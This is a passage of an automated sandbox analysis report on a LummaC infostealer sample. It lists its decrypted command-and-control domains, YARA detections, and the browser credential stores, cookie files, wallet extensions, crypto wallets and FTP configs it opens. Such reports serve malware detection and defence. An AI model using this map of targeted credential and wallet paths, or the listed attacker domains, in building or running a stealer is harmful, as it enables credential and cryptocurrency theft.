                      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeAPI call chain: ExitProcess graph end nodegraph_0-26334
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043A9B0 LdrInitializeThunk,0_2_0043A9B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_008E9B6B push dword ptr fs:[00000030h]0_2_008E9B6B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]0_2_0248092B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]0_2_02480D90

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      LummaC encrypted strings found
                      Source: MPgkx6bQIQ.exeString found in binary or memory: hummskitnj.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: cashfuzysao.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: appliacnesot.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: screwamusresz.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: inherineau.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: scentniej.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: rebuildeso.buzz
                      Source: MPgkx6bQIQ.exeString found in binary or memory: prisonyfork.buzz
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MPgkx6bQIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MPgkx6bQIQ.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\L
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb35
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
